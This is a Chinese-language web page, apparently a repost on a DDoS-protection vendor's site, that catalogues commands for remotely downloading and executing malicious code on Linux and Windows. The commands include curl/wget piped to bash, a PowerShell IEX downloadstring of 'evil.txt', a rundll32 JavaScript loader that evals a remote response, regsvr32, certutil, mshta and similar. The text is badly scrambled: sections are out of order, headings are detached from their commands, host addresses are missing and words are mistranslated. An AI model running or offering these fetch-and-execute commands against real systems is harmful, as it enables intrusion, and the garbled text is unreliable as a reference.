经过命令下载执行DDoS防御恶意代码的几种姿势-墨者安全-墨者盾
DDOS防御_CC防护_高防CDN服务器_【墨者安全】—墨者盾墨者盾—你的网站贴身保镖!
QQ:800185041
高防免费接入:400-0797-119

渠道合作:156 2527 6999

主页 > CC防护 > 经过命令下载执行DDoS防御恶意代码的几种姿势

经过命令下载执行DDoS防御恶意代码的几种姿势

小墨安全管家 2020-08-25 22:30 CC防护 89 ℃
DDoS防御

wget -q -O- :8080/test.sh)|bash -sh >/dev/null 2>&1&' 

scp 是 rcp 的加强版,scp 是加密的,rcp 是不加密的。

方式1:wget -q -O- :8080/test.sh | bash 

远程加载执行,解析.src文件。

02、Bitsadmin

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET",":8888/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);} 

03、certutil

03、rcp

certutil -urlcache -split -f  delete 

IEexec.exe应用程序是.NET Framework附带程序,运行IEExec.exe并使用url启动其他程序。

05、rsync

10、msxsl

EOF 

certutil -urlcache -split -f  test.php 

quit  

用于备份证书服务,普通建议下载完文件后对缓存举行删除。

06、sftp

08、IEExec

rcp命令用于复制远程文件或名目。

scp username@servername:/path/filename /tmp/local_destination 

06、wmic

以用curl的方式执行http页面上的shell足本,无需download,在本地机器上直截了当执行。

利用powershell远程执行ps1足本。

01、curl

sftp admin@192.168.99.242 <<EOF   

05、regsvr32

04、rundll32

09、mshta

本文转载自微信公众号「Bypass」,作者Bypass。转载本文请联系Bypass公众号。

#删除缓存 

rsync -av x.x.x.x:/tmp/passwd.txt  /tmp/passwd.txt 

powershell -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.28.128/evil.txt'))" 

在Windows 7以上版本存在一具名为pubprn.vbs的微软已签名WSH足本,能够利用来解析.sct足本:

07、msiexec

mshta  

msiexec /q /i  

02、wget

在目标主机执行恶意代码,能够分为上传/下载并执行恶意代码和无文件远程恶意代码执行。接下来,我们来总结一下Linux和Windows中下载和执行恶意代码的一些姿势。

方式2:wget :8080/shell.txt -O /tmp/x.php && php /tmp/x.php 

mshta用于执行.hta文件

利用bitsadmin命令下载文件到目标机器。

#下载文件 

msxsl  exec.xsl 

11、pubprn.vbs

msxsl.exe是微软用于命令行下处理XSL的一具程序

rcp root@x.x.x.x:./testfile testfile 

04、scp

方式2:bash < <( curl :8080/test.sh  ) 

wmic os get /FORMAT:"" 

二、Windows 远程恶意代码执行

bitsadmin /transfer n  d:\test\1.txt 

regsvr32.exe /u /n /s /i::8888/file.sct scrobj.dll 

get  /tmp/2.txt             

curl+wget合并,实现无文件远程恶意代码执行。

crosoft.NET\Framework64\v2.0.50727>caspol.exe -s off 

一、Linux 远程恶意代码执行

"C:\Windows\System32\Printing_Admin_Scripts\zh-CN\pubprn.vbs" 127.0.0.1 script:https: 

执行wget命令远程下载恶意程序。

执行WMIC以下命令从远程服务器下载并运行恶意XSL文件:

在渗透过程中,攻击者往往需要经过命令下载执行恶意代码,实现信息收集、持久化、权限提升、谨防绕过、提取凭证、横向挪移、数据渗出等操作。

01、Powershell

使用rsync能够举行远程同步,拉取文件到本地服务器。

通过命令下载执行DDoS谨防恶意代码的几种姿势

方式1:curl -fsSL :8080/test.sh | bash 

C:\Windows\Microsoft.NET\Framework64\v2.0.50727>IEExec.exe  

用于安装Windows Installer安装包,可远程执行msi文件。

使用rundll32.exe,能够经过mshtml.dll执行JavaScript ,依靠于WScript.shell那个组件

bash -c '(curl -fsSL :8080/test.sh|| 

使用sftp下载远程服务器上的文件。


DDoS防御

当前位置:主页 > CC防护 > 经过命令下载执行DDoS防御恶意代码的几种姿势

标签列表
DDoS防御
网站分类
X
 

QQ客服

400-0797-119